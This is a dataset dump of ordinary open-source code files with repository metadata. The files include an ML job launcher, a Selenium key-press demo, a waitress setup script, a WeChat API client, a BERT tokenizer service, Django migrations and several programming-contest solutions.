blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
288
content_id
stringlengths
40
40
detected_licenses
listlengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
684 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
147 values
src_encoding
stringclasses
25 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
128
12.7k
extension
stringclasses
142 values
content
stringlengths
128
8.19k
authors
listlengths
1
1
author_id
stringlengths
1
132
6bbe882811dcb39c98a7a58fd9cc5cf75366df5a
7f52845b5aca331ac200565f897b2b1ba3aa79d9
/m251/exp_groups/paper/nlp/intermediate_hf/launch/launch_merge.py
cc08f799d18321b4e1506eabebbcc848c67fca1b
[]
no_license
mmatena/m251
f8fb4ba9c10cd4dfcf5ee252f80e4832e4e86aa0
e23249cf0896c5b42bcd07de70f7b9996d8b276b
refs/heads/master
2023-05-06T10:44:10.945534
2021-06-03T15:07:29
2021-06-03T15:07:29
321,217,654
0
0
null
null
null
null
UTF-8
Python
false
false
2,698
py
""" export PYTHONPATH=$PYTHONPATH:~/Desktop/projects/m251:~/Desktop/projects/del8 python3 m251/exp_groups/paper/nlp/intermediate_hf/launch/launch_merge.py """ from del8.executors.gce import gce from del8.executors.vastai import vastai from del8.executors.vastai import api_wrapper from m251.exp_groups.paper.nlp.intermediate_hf import merge # EXP = merge.Merge_BertBase_Pairs # EXP = merge.Merge_BertBaseFromMnli_Pairs # EXP = merge.Merge_BertBaseFromMnli_SquadDonor_4096 # EXP = merge.Merge_BertBase_SquadDonor_4096 # EXP = merge.Merge_BertBaseFromMnli_SquadDonor_1024 # EXP = merge.Merge_BertBase_HighResource_SquadDonor_4096 # EXP = merge.Merge_BertBase_RteHoldout_LastCkpt # EXP = merge.Merge_BertBase_RteHoldout_LastCkpt2 # EXP = merge.Merge_BertBase_RteHoldout_LastCkpt50 # EXP = merge.DummyMerge_BertBase_Pairs # EXP = merge.DummyMerge_BertBaseFromMnli_Pairs execution_items = [] EXP = merge.DummyMerge_BertBaseFromMnli_SquadDonor_4096 execution_items.extend(EXP.create_all_execution_items()) EXP = merge.DummyMerge_BertBase_SquadDonor_4096 execution_items.extend(EXP.create_all_execution_items()) EXP = merge.DummyMerge_BertBase_HighResource_SquadDonor_4096 execution_items.extend(EXP.create_all_execution_items()) # execution_items = EXP.create_all_execution_items() print(f"Number of execution items to process: {len(execution_items)}") vast_params = vastai.create_supervisor_params( EXP, execution_items=execution_items, num_workers=8, offer_query=vastai.OfferQuery( queries_str=" ".join( [ "reliability > 0.95", "num_gpus=1", "dph < 2.25", "inet_down > 100", "inet_up > 75", # "gpu_ram >= 10", # "dlperf >= 16", "cuda_vers >= 11.0 has_avx = true", ] ), order_str="dlperf_usd-", ), disk_gb=16, image="tensorflow/tensorflow:2.4.0-gpu", ) offers = api_wrapper.query_offers(vast_params) print(f"Number of acceptable offers: {len(offers)}") launch_params = gce.GceParams() node, deploy = gce.launch(execution_items, vast_params, launch_params) # # # ############################################################################### # Stages of testing: ############################################################################### # if True: # from del8.core.execution import entrypoint # from del8.storages.gcp import gcp # gcp.PERSISTENT_CACHE = True # EXP.to_dev_mode() # execution_items = EXP.create_all_execution_items() # print(f'Number of execution items to process: {len(execution_items)}') # entrypoint.worker_run(**execution_items[0].worker_run_kwargs)
[ "michael.matena@gmail.com" ]
michael.matena@gmail.com
c56a454c10c2d14f2ef6ba96e577d2d45f93969c
e663909cec3c4eda12bb705fce9a6dc901bb7d88
/爬虫/day06 鼠标操作/code/seleniumtest_16_按键.py
4dd0d6edad17eba87b125eeab8e8ced153c844e6
[]
no_license
1284753334/learning2
a03f293965a652883503cae420d8b1ad11ae6661
f2fcb3c856656cc8427768b41add3ee083487592
refs/heads/master
2023-01-30T23:18:26.951210
2020-12-20T15:57:18
2020-12-20T15:57:18
315,065,804
2
0
null
null
null
null
UTF-8
Python
false
false
1,981
py
# _ooOoo_ # o8888888o # 88" . "88 # (| -_- |) # O\ = /O # ____/`---'\____ # .' \\| |// `. # / \\||| : |||// \ # / _||||| -:- |||||- \ # | | \\\ - /// | | # | \_| ''\---/'' | | # \ .-\__ `-` ___/-. / # ___`. .' /--.--\ `. . __ # ."" '< `.___\_<|>_/___.' >'"". # | | : `- \`.;`\ _ /`;.`/ - ` : | | # \ \ `-. \_ __\ /__ _/ .-` / / # ======`-.____`-.___\_____/___.-`____.-'====== # `=---=' # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ # 佛祖保佑 永无BUG from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains # 要想调用键盘按键操作需要引入 keys 包 from selenium.webdriver.common.keys import Keys from time import sleep driver = webdriver.Chrome() driver.implicitly_wait(10) driver.maximize_window() driver.get('http://sahitest.com/demo/keypress.htm') key_up_radio = driver.find_element_by_id('r1') # 监测按键升起 key_down_radio = driver.find_element_by_id('r2') # 监测按键按下 key_press_radio = driver.find_element_by_id('r3') # 监测按键按下升起 enter = driver.find_elements_by_xpath('//form[@name="f1"]/input')[1] # 输入框 result = driver.find_elements_by_xpath('//form[@name="f1"]/input')[0] # 监测结果 sleep(5) # 监测 key_down key_down_radio.click() ActionChains(driver).key_down(Keys.CONTROL, enter).key_up(Keys.CONTROL).perform() print(result.get_attribute('value')) sleep(5) # 监测 key_up key_up_radio.click() enter.click() ActionChains(driver).key_down(Keys.SHIFT).key_up(Keys.SHIFT).perform() print(result.get_attribute('value')) # 监测 key_press sleep(5) key_press_radio.click() enter.click() ActionChains(driver).send_keys('a').perform() print(result.get_attribute('value')) sleep(5) driver.quit()
[ "huapenghui@git.com" ]
huapenghui@git.com
bc18ab4f6f5f1d9b7afd1cc6ca0f98ab5d45e733
6490651cbbeb75e45974476dfacd9bd224e535f5
/setup.py
061e67e604b1dbdba53b9b68ae34cd227a26a0ef
[ "ZPL-2.1" ]
permissive
ajmitch/waitress
e1c5c4ffdb7ba6d3382afab70244e88ccb8cb4e2
5b73ec67e8bb99152f4113c98b586846dcb3dd55
refs/heads/master
2021-01-18T09:05:00.798542
2012-01-06T06:26:06
2012-01-06T06:26:06
3,114,643
0
0
null
null
null
null
UTF-8
Python
false
false
2,350
py
############################################################################## # # Copyright (c) 2006 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## import os from setuptools import setup, find_packages here = os.path.abspath(os.path.dirname(__file__)) try: README = open(os.path.join(here, 'README.rst')).read() CHANGES = open(os.path.join(here, 'CHANGES.txt')).read() except IOError: README = CHANGES = '' setup( name='waitress', version='0.5', author='Zope Foundation and Contributors', author_email='zope-dev@zope.org', maintainer="Chris McDonough", maintainer_email="chrism@plope.com", description='Waitress WSGI server', long_description = README +'\n\n' + CHANGES, license='ZPL 2.1', keywords='waitress wsgi server http', classifiers = [ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: Zope Public License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", 'Natural Language :: English', 'Operating System :: OS Independent', 'Topic :: Internet :: WWW/HTTP', ], url='https://github.com/Pylons/waitress', packages=find_packages(), install_requires=[ 'setuptools', ], include_package_data=True, test_suite='waitress', zip_safe=False, entry_points=""" [paste.server_runner] main = waitress:serve_paste """ )
[ "chrism@plope.com" ]
chrism@plope.com
d6e05b5fd8b827e3e237c651b0d26ce6266e2e74
80052e0cbfe0214e4878d28eb52009ff3054fe58
/e2yun_addons/odoo12/wx_tools/basewechat/wxclient.py
cbd74df32bc848f61bcd363947cca1dbf1e7fda9
[]
no_license
xAlphaOmega/filelib
b022c86f9035106c24ba806e6ece5ea6e14f0e3a
af4d4b079041f279a74e786c1540ea8df2d6b2ac
refs/heads/master
2021-01-26T06:40:06.218774
2020-02-26T14:25:11
2020-02-26T14:25:11
243,349,887
0
2
null
2020-02-26T19:39:32
2020-02-26T19:39:31
null
UTF-8
Python
false
false
2,795
py
# -*-coding:utf-8-*- import logging import time import requests from requests.compat import json as _json from wechatpy.constants import WeChatErrorCode from werobot.client import Client from werobot.client import check_error logger = logging.getLogger(__name__) class WxClient(Client): def request(self, method, url, **kwargs): if "params" not in kwargs: kwargs["params"] = {"access_token": self.token} if isinstance(kwargs.get("data", ""), dict): body = _json.dumps(kwargs["data"], ensure_ascii=False) body = body.encode('utf8') kwargs["data"] = body r = requests.request(method=method, url=url, **kwargs) r.raise_for_status() r.encoding = "utf-8" json = r.json() if 'errcode' in json: json['errcode'] = int(json['errcode']) if 'errcode' in json and json['errcode'] != 0: errcode = json['errcode'] errmsg = json.get('errmsg', errcode) if errcode in ( WeChatErrorCode.INVALID_CREDENTIAL.value, WeChatErrorCode.INVALID_ACCESS_TOKEN.value, WeChatErrorCode.EXPIRED_ACCESS_TOKEN.value): logger.info('Access token expired, fetch a new one and retry request') self.session.delete(self.access_token_key) self.get_access_token() access_token = self.session.get(self.access_token_key) logger.info('get new token %s' % access_token) kwargs["params"] = {"access_token": access_token} return super(WxClient, self).request(method=method, url=url, **kwargs) else: if check_error(json): return json if check_error(json): return json def get_access_token(self): """ 重写有保存token :return: 返回token """ self.token_expires_at = self.session.get(self.access_token_key_expires_at) self._token = self.session.get(self.access_token_key) if self._token and self.token_expires_at: now = time.time() if self.token_expires_at - now > 60: return self._token json = self.grant_token() self._token = json["access_token"] self.token_expires_at = int(time.time()) + json["expires_in"] self.session.set(self.access_token_key, self._token) self.session.set(self.access_token_key_expires_at, self.token_expires_at) return self._token @property def access_token_key(self): return '{0}_access_token'.format(self.appid) @property def access_token_key_expires_at(self): return '{0}_access_token__expires_at'.format(self.appid)
[ "hepeng1@163.com" ]
hepeng1@163.com
1729264e68e90f6adaf2e02e1f8aa993275afdc4
6b2a8dd202fdce77c971c412717e305e1caaac51
/solutions_5648941810974720_0/Python/kmwho/A.py
277ac8dd0919a4ab3da742054999cbdc87dbe0d8
[]
no_license
alexandraback/datacollection
0bc67a9ace00abbc843f4912562f3a064992e0e9
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
refs/heads/master
2021-01-24T18:27:24.417992
2017-05-23T09:23:38
2017-05-23T09:23:38
84,313,442
2
4
null
null
null
null
UTF-8
Python
false
false
882
py
#! /usr/bin/python # kmwho # CodeJam 2016 1A from __future__ import print_function import numpy as np import math def solvecase(): s = input().strip() alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" count = { c:0 for c in alpha } nums = [ "ZERO", "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT", "NINE" ] digits = [] for c in s: count[c] += 1 A = np.matrix(np.zeros( (26,10) )) for r in range(26): for c in range(10): A[r,c] = nums[c].count( chr(ord("A") + r ) ) b = [ count[c] for c in alpha ] X = (A.I).dot(b) digitCount = [ int(round(d)) for d in X.flat ] digits = [] for d in range(10): for x in range(digitCount[d]): digits.append( str(d) ) return "".join(digits) def solve(): T = int(input()) for t in range(1,T+1): res = solvecase() print( "Case #" + str(t) + ": " + str(res) ) def main(): solve() main()
[ "alexandra1.back@gmail.com" ]
alexandra1.back@gmail.com
49b2cbe91dcf58a52a374da8f48ca4f24ba256a6
3649308c5d709100c4dc90e661fc9f564f184877
/ocs/student/migrations/0002_auto_20200111_1925.py
770b71e5b1126d729d0198e2d85b190c07d318af
[]
no_license
anirudhasj441/django
54171f6141d6938201146a6d3e9475477a3f0078
5bb202d13d4b17daca9aedf3b213908c3245757b
refs/heads/master
2021-07-09T06:18:11.597848
2021-03-07T17:58:32
2021-03-07T17:58:32
230,616,005
0
0
null
null
null
null
UTF-8
Python
false
false
433
py
# Generated by Django 3.0.1 on 2020-01-11 13:55 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('student', '0001_initial'), ] operations = [ migrations.AlterField( model_name='assigments', name='date', field=models.DateField(default=datetime.date(2020, 1, 11)), ), ]
[ "anirudhasj441@gmail.com" ]
anirudhasj441@gmail.com
f469a19b6eda6cb3a39531b0281881165cae515c
afaa3270ee705ba511b484c7d84377d31e3533f4
/client/commands/restart.py
583766107e2b0fa048c36da50f01fb475648a874
[ "MIT" ]
permissive
moneytech/pyre-check
b6cfe99d9c2bdb3cf3d3a33c2534e2e70d391085
dae90bee716fc1c3f2e9d9c0496e5cdd14c99701
refs/heads/master
2022-12-14T22:46:54.864244
2020-09-09T17:25:53
2020-09-09T17:27:29
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,640
py
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import argparse from typing import Optional from ..analysis_directory import AnalysisDirectory, resolve_analysis_directory from ..configuration import Configuration from .command import Command, CommandArguments, ExitCode, IncrementalStyle from .incremental import Incremental from .start import Start # noqa from .stop import Stop class Restart(Command): NAME = "restart" def __init__( self, command_arguments: CommandArguments, original_directory: str, *, configuration: Optional[Configuration] = None, analysis_directory: Optional[AnalysisDirectory] = None, terminal: bool, store_type_check_resolution: bool, use_watchman: bool, incremental_style: IncrementalStyle, ) -> None: super(Restart, self).__init__( command_arguments, original_directory, configuration, analysis_directory ) self._terminal: bool = terminal self._store_type_check_resolution: bool = store_type_check_resolution self._use_watchman: bool = use_watchman self._incremental_style: IncrementalStyle = incremental_style @staticmethod def from_arguments( arguments: argparse.Namespace, original_directory: str, configuration: Optional[Configuration] = None, analysis_directory: Optional[AnalysisDirectory] = None, ) -> "Restart": return Restart( CommandArguments.from_arguments(arguments), original_directory, configuration=configuration, analysis_directory=analysis_directory, terminal=arguments.terminal, store_type_check_resolution=arguments.store_type_check_resolution, use_watchman=not arguments.no_watchman, incremental_style=arguments.incremental_style, ) @classmethod def add_subparser(cls, parser: argparse._SubParsersAction) -> None: restart = parser.add_parser( cls.NAME, epilog="Restarts a server. Equivalent to `pyre stop && pyre`." ) restart.set_defaults(command=cls.from_arguments) restart.add_argument( "--terminal", action="store_true", help="Run the server in the terminal." ) restart.add_argument( "--store-type-check-resolution", action="store_true", help="Store extra information for `types` queries.", ) restart.add_argument( "--no-watchman", action="store_true", help="Do not spawn a watchman client in the background.", ) restart.add_argument( "--incremental-style", type=IncrementalStyle, choices=list(IncrementalStyle), default=IncrementalStyle.FINE_GRAINED, help="How to approach doing incremental checks.", ) def generate_analysis_directory(self) -> AnalysisDirectory: return resolve_analysis_directory( self._command_arguments.source_directories, self._command_arguments.targets, self._configuration, self._original_directory, self._project_root, filter_directory=self._command_arguments.filter_directory, buck_mode=self._command_arguments.buck_mode, relative_local_root=self._configuration.relative_local_root, ) def _run(self) -> None: exit_code = ( Stop( self._command_arguments, self._original_directory, configuration=self._configuration, analysis_directory=self._analysis_directory, from_restart=True, ) .run() .exit_code() ) if exit_code != ExitCode.SUCCESS: self._exit_code = ExitCode.FAILURE return exit_code = ( Incremental( self._command_arguments, self._original_directory, configuration=self._configuration, analysis_directory=self._analysis_directory, # Force the incremental run to be blocking. nonblocking=False, incremental_style=self._incremental_style, no_start_server=False, no_watchman=not self._use_watchman, ) .run() .exit_code() ) self._exit_code = exit_code
[ "facebook-github-bot@users.noreply.github.com" ]
facebook-github-bot@users.noreply.github.com
0882dede30a8e3d97273c8afa447882ce630c447
9b50b3a7dda2711c5665909f6801249de53e70f6
/0x03-python-data_structures/3-print_reversed_list_integer.py
49d1b256e98d2d1174d1faa6a47f2f766d9695ad
[]
no_license
nikolasribeiro/holbertonschool-higher_level_programming
3119e5442887f06da104dc8aa93df371f92b9f2b
7dcdf081d8a57ea1f5f6f9830555f73bf2ae6993
refs/heads/main
2023-04-21T05:22:03.617609
2021-05-05T11:38:51
2021-05-05T11:38:51
319,198,337
0
0
null
null
null
null
UTF-8
Python
false
false
182
py
#!/usr/bin/python3 def print_reversed_list_integer(my_list=[]): if isinstance(my_list, list): for element in reversed(my_list): print("{:d}".format(element))
[ "nikolasribeiro2@outlook.com" ]
nikolasribeiro2@outlook.com
0e582df943dd67cd17d19d44d5333d5eae4c2c83
7b74696ff2ab729396cba6c203984fce5cd0ff83
/tradeaccounts/migrations/0019_auto_20200521_1511.py
cab75d17d845a2269e5dfa7899ae5acd158132b6
[ "MIT" ]
permissive
webclinic017/investtrack
e9e9a7a8caeecaceebcd79111c32b334c4e1c1d0
4aa204b608e99dfec3dd575e72b64a6002def3be
refs/heads/master
2023-06-18T12:57:32.417414
2021-07-10T14:26:53
2021-07-10T14:26:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
519
py
# Generated by Django 3.0.2 on 2020-05-21 07:11 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('tradeaccounts', '0018_auto_20200520_1603'), ] operations = [ migrations.AlterField( model_name='tradeaccountsnapshot', name='applied_period', field=models.CharField(blank=True, choices=[('d', '日'), ('w', '周'), ('m', '月')], default='d', max_length=1, verbose_name='收益周期'), ), ]
[ "jie.han@outlook.com" ]
jie.han@outlook.com
88342e7dee0c043519626340d3fe5daff980f706
90ca69d5d6bd9d08ee2d2b8150eb2fa6a6b00e72
/src/services/tokenize/bert_tokenize_service.py
5ba2812727be96c4859db73377c88ee44b9dcca2
[ "CC-BY-4.0" ]
permissive
budh333/UnSilence_VOC
07a4a5a58fd772230bfe1ffbcb8407de89daa210
f6ba687f96f2c23690c84590adcb24ee239aa86b
refs/heads/main
2023-05-26T20:49:49.105492
2023-05-12T23:18:50
2023-05-12T23:18:50
388,462,045
6
1
null
null
null
null
UTF-8
Python
false
false
2,829
py
import os from typing import Tuple, List from overrides import overrides from tokenizers import BertWordPieceTokenizer from tokenizers.implementations import ByteLevelBPETokenizer from tokenizers.processors import BertProcessing import sentencepiece as spm from enums.configuration import Configuration from services.arguments.pretrained_arguments_service import PretrainedArgumentsService from services.tokenize.base_tokenize_service import BaseTokenizeService from services.file_service import FileService class BERTTokenizeService(BaseTokenizeService): def __init__( self, arguments_service: PretrainedArgumentsService, file_service: FileService): super().__init__() self._arguments_service = arguments_service self._file_service = file_service pretrained_weights = self._arguments_service.pretrained_weights configuration = self._arguments_service.configuration vocabulary_path = os.path.join(self._arguments_service.data_folder, 'vocabularies', f'{pretrained_weights}-vocab.txt') if not os.path.exists(vocabulary_path): raise Exception(f'Vocabulary not found in {vocabulary_path}') self._tokenizer: BertWordPieceTokenizer = BertWordPieceTokenizer(vocabulary_path, lowercase=False) @overrides def encode_tokens(self, tokens: List[str]) -> List[int]: result = [self._tokenizer.token_to_id(x) for x in tokens] return result @overrides def decode_tokens(self, character_ids: List[int]) -> List[str]: result = [self._tokenizer.id_to_token( character_id) for character_id in character_ids] return result @overrides def decode_string(self, character_ids: List[int]) -> List[str]: result = self._tokenizer.decode(character_ids) return result @overrides def id_to_token(self, character_id: int) -> str: result = self._tokenizer.id_to_token(character_id) return result @overrides def encode_sequence(self, sequence: str) -> Tuple[List[int], List[str], List[Tuple[int,int]], List[int]]: encoded_representation = self._tokenizer.encode(sequence) return ( encoded_representation.ids, encoded_representation.tokens, encoded_representation.offsets, encoded_representation.special_tokens_mask) @overrides def encode_sequences(self, sequences: List[str]) -> List[Tuple[List[int], List[str], List[Tuple[int,int]], List[int]]]: encoded_representations = self._tokenizer.encode_batch(sequences) return [(x.ids, x.tokens, x.offsets, x.special_tokens_mask) for x in encoded_representations] @property @overrides def vocabulary_size(self) -> int: return self._tokenizer.get_vocab_size()
[ "kztodorov@outlook.com" ]
kztodorov@outlook.com
9d69ca141cb222bcaaadafbd4cec3717e860a907
1f73dc7507361ba35ebecd70635a797bc408414c
/py/15.py
bcee4c3f9ec5137e45e54fffd375e0e776d7c473
[]
no_license
permCoding/speedCoding-01-solutions
e8b1043209b1c431b9fdb86e2c265b48fb82ef5b
bf62b77abe9f69486412a7f595c1cf54416479b0
refs/heads/master
2020-11-27T10:44:03.555157
2019-12-23T16:01:23
2019-12-23T16:01:23
229,408,709
0
0
null
null
null
null
UTF-8
Python
false
false
187
py
n, k = map(int, input().split()) def get(N, K): if K == 0: return 1 if N == 0 else 0 if N == 0: return 0 return get(N-1, K-1) + get(N+1, K-1) print(get(n,k))
[ "ttxiom@gmail.com" ]
ttxiom@gmail.com
3df7bcb85dba0398b40efa4868900a6dedc22f36
46f44f80d63c13fcb61dacf7e08d072fb85b58dc
/MostCommonQuestions/25.removeDuplicates.py
02be555260fd9c852cab5e001f86f55ccc452660
[]
no_license
bzamith/MySDEInterviewStudies
ef6d7add97596bded460023a74ba8b77dcebf350
9eea12cc8da3f51532140ed9423ce2a8be9fbdfa
refs/heads/master
2023-02-25T11:41:28.877263
2021-02-01T10:51:48
2021-02-01T10:51:48
265,734,795
12
3
null
2020-10-05T22:21:57
2020-05-21T02:25:15
Python
UTF-8
Python
false
false
861
py
# Source: https://leetcode.com/problems/remove-duplicates-from-sorted-array/ # Problem: "Remove Duplicates from Sorted Array in Place" # Example: # Given a sorted array nums, remove the duplicates in-place such that each element appear only once and return the new length. # Do not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory. # Approach: # Two-pointers approach # Complexity: # O(N) time # O(1) space def removeDuplicates(nums): count = 0 if len(nums) < 2: return nums for i in range(1,len(nums)): if nums[i] == nums[i-1]: count += 1 else: nums[i-count] = nums[i] return nums[0:len(nums) - count] if __name__ == "__main__": print(removeDuplicates([0,0,0,1,1,2,3])) print(removeDuplicates([0,0,1,2,3,3]))
[ "noreply@github.com" ]
bzamith.noreply@github.com
aecea41605b5c7d5084faa397fb616fd19c5d700
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p04034/s271062170.py
060f9afcca29c5ceddf8d3a1e05771040ec30d15
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
532
py
n , m = map(int,input().split()) aka = [False for i in range(n+1)] kazu = [1 for i in range(n+1)] aka[1] = True for i in range(m): x , y = map(int,input().split()) if aka[x]: if kazu[x] >= 2: kazu[x] -= 1 kazu[y] += 1 elif kazu[x] == 1: kazu[x] -= 1 kazu[y] += 1 aka[x] = False aka[y] = True elif not aka[x]: kazu[x] -= 1 kazu[y] += 1 ans = 0 for i in range(1,n+1): if aka[i]: ans += 1 print(ans)
[ "66529651+Aastha2104@users.noreply.github.com" ]
66529651+Aastha2104@users.noreply.github.com
f9ccc381f1d82dbbce7caa871d0b8a5a18779e15
85e89ff0a842c74c5bae220ed694bdbc3e4eba8e
/src/sploitego/transforms/dnsptrlookup.py
b01aa10f9f0b9111301d8d6d8dcc1f87c708e41e
[]
no_license
AAG-SATIEDN/sploitego
ff368ea1e432720c0346fee1805d6b9f76b7b35f
36fa21485fbe44f14406921aa267762bb4f07bd9
refs/heads/master
2021-01-18T03:47:54.068637
2014-04-20T02:50:22
2014-04-20T02:50:22
20,336,835
2
0
null
null
null
null
UTF-8
Python
false
false
947
py
#!/usr/bin/env python from canari.maltego.configuration import BuiltInTransformSets from canari.maltego.entities import IPv4Address from canari.framework import configure from common.entities import IPv6Address from common.dnstools import nslookup __author__ = 'Nadeem Douba' __copyright__ = 'Copyright 2012, Sploitego Project' __credits__ = [] __license__ = 'GPL' __version__ = '0.2' __maintainer__ = 'Nadeem Douba' __email__ = 'ndouba@gmail.com' __status__ = 'Development' __all__ = [ 'dotransform' ] @configure( label='To DNS Name [DNS]', description='This transform will fetch the DNS records for a IP address.', uuids=[ 'sploitego.v2.IPv4AddressToDNSName_DNS', 'sploitego.v2.IPv6AddressToDNSName_DNS' ], inputs=[ ( BuiltInTransformSets.DNSFromIP, IPv4Address ), ( BuiltInTransformSets.DNSFromIP, IPv6Address ) ] ) def dotransform(request, response): nslookup(request.value, 'PTR', response) return response
[ "ndouba@gmail.com" ]
ndouba@gmail.com
1518a5d2a8c4b5414f21d19249553414d0f08678
0a63223decec3c45fdde3fffc7ca645ddcdb911c
/prev/baekjoon/8주차/12100/12100_jy.py
70d01d8463c58bc3f7b87b0ea6ce787d189305a7
[]
no_license
WebProject-STT/Algorithm
8fe1f0d4bc176784c072ae88ab154aadcdf92e85
005cfd6a803b1dbd9ede501a2133655650d0ee38
refs/heads/main
2023-07-10T02:49:36.450595
2021-08-09T12:54:13
2021-08-09T12:54:13
335,193,677
0
1
null
null
null
null
UTF-8
Python
false
false
4,598
py
# 2048(easy) import sys from collections import deque N = int(sys.stdin.readline()) max_ = -sys.maxsize grids = [list(map(int, sys.stdin.readline().split())) for _ in range(N)] def find_max(grid): global max_ for g in grid: max_ = max(max_, max(g)) return def move_up(grid): for c in range(N): stack = [] for r in range(N): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([0, grid[r][c], False]) if r: # 0번 인덱스가 아니면 grid[0][c] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: # 합쳐질 수 있으면 stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[stack[-1][0]][c] = stack[-1][1] else: grid[stack[-1][0]+1][c] = grid[r][c] if r != stack[-1][0]+1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]+1, grid[stack[-1][0]+1][c], False]) return grid def move_down(grid): for c in range(N): stack = [] for r in range(-1, -N-1, -1): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([-1, grid[r][c], False]) if r != -1: # -1번 인덱스가 아니면 grid[-1][c] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[stack[-1][0]][c] = stack[-1][1] else: grid[stack[-1][0]-1][c] = grid[r][c] if r != stack[-1][0]-1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]-1, grid[stack[-1][0]-1][c], False]) return grid def move_left(grid): for r in range(N): stack = [] for c in range(N): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([0, grid[r][c], False]) if c: # -1번 인덱스가 아니면 grid[r][0] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[r][stack[-1][0]] = stack[-1][1] else: grid[r][stack[-1][0]+1] = grid[r][c] if c != stack[-1][0]+1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]+1, grid[r][stack[-1][0]+1], False]) return grid def move_right(grid): for r in range(N): stack = [] for c in range(-1, -N-1, -1): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([-1, grid[r][c], False]) if c != -1: # -1번 인덱스가 아니면 grid[r][-1] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[r][stack[-1][0]] = stack[-1][1] else: t = grid[r][c] grid[r][stack[-1][0]-1] = grid[r][c] if c != stack[-1][0]-1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]-1, grid[r][stack[-1][0]-1], False]) return grid def dfs(dfs_grid, n): if n == 5: find_max(dfs_grid) return dfs(move_up([g[:] for g in dfs_grid]), n+1) dfs(move_down([g[:] for g in dfs_grid]), n+1) dfs(move_left([g[:] for g in dfs_grid]), n+1) dfs(move_right([g[:] for g in dfs_grid]), n+1) dfs(grids, 0) # print(move_up([g[:] for g in grids])) # print(move_down([g[:] for g in grids])) # print(move_left([g[:] for g in grids])) # print(move_right([g[:] for g in grids])) print(max_)
[ "vallot7@naver.com" ]
vallot7@naver.com
fa5957613e2484fe7f441729fce5a1c4086f6a4b
963a5564965e4181caa8a1c66396d714865bc236
/django_cradmin/demo/cradmin_javascript_demos/migrations/0004_fictionalfigure_is_godlike.py
a81ea3c69c3046033dc16fe8677b4d7f1287c1c8
[ "BSD-3-Clause" ]
permissive
appressoas/django_cradmin
d6694b87cf8a7e53b4b6c3049c085560eeba2c9f
944e8202ac67c3838b748ff8f3a0b2a2870619bc
refs/heads/master
2023-07-20T14:15:03.426470
2023-07-17T11:33:10
2023-07-17T11:33:10
20,762,263
12
3
BSD-3-Clause
2023-02-15T20:32:49
2014-06-12T09:45:04
JavaScript
UTF-8
Python
false
false
441
py
